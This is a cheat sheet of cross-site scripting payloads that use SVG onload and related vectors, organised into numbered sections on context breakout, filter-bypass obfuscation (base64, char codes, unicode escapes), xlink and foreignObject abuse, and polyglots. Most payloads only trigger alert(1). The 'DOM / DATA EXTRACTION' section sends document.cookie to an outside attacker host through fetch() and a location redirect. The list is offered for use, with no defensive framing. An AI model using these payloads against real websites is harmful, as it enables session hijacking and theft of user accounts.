🔥 ULTIMATE SVG / ONLOAD XSS (CLEAN)

⸻

1. CORE (ENG MUHIM)

<svg onload=alert(1)>
<svg/onload=alert(1)>
<svg onload=prompt(1)>
<svg><g onload=alert(1)></g></svg>


⸻

2. CONTEXT BREAKOUT

"><svg onload=alert(1)>
'><svg onload=alert(1)>
</script><svg onload=alert(1)>


⸻

3. OBFUSCATION / BYPASS

<svg onload=alert(String.fromCharCode(88,83,83))>
<svg onload=\u0061lert(1)>
<svg onload=eval(atob("YWxlcnQoMSk="))>


⸻

4. ADVANCED JS EXECUTION

<svg onload=eval("alert(1)")>
<svg onload=new Function("alert(1)")()>
<svg onload=setTimeout(alert,0,1)>


⸻

5. DOM / DATA EXTRACTION

<svg onload=alert(document.cookie)>
<svg onload=fetch('//attacker.com?c='+document.cookie)>
<svg onload=location='//attacker.com?c='+document.cookie>


⸻

6. ANIMATION / XLINK ABUSE

<svg xmlns:xlink="http://www.w3.org/1999/xlink">
<animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s"/>
</svg>

<svg>
<a xlink:href="javascript:alert(1)">
<rect width="100" height="100"/>
</a>
</svg>


⸻

7. SCRIPT TAG INSIDE SVG

<svg><script>alert(1)</script></svg>
<svg><script>alert&#40;1&#41;</script></svg>


⸻

8. FOREIGNOBJECT (POWERFUL)

<svg>
<foreignObject>
<body onload=alert(1)>
</foreignObject>
</svg>


⸻

9. CDATA / PARSER ABUSE

<svg><![CDATA[><img src=x onerror=alert(1)>]]></svg>


⸻

10. ATTRIBUTE BYPASS

<svg/onload=alert(1)>
<svg onload = alert(1)>
<svg onload=alert(1)//>


⸻

11. EVENT VARIATIONS

<svg onmouseover=alert(1)>
<svg onclick=alert(1)>
<svg onfocus=alert(1)>


⸻

12. POLYGLOT

</title><svg onload=alert(1)>


⸻

13. MODERN JS

<svg onload=alert`1`>
<svg onload=(()=>alert(1))()>


⸻

14. RARE TRICKS

<svg onload=throw alert(1)>
<svg onload=onerror=alert;throw 1>
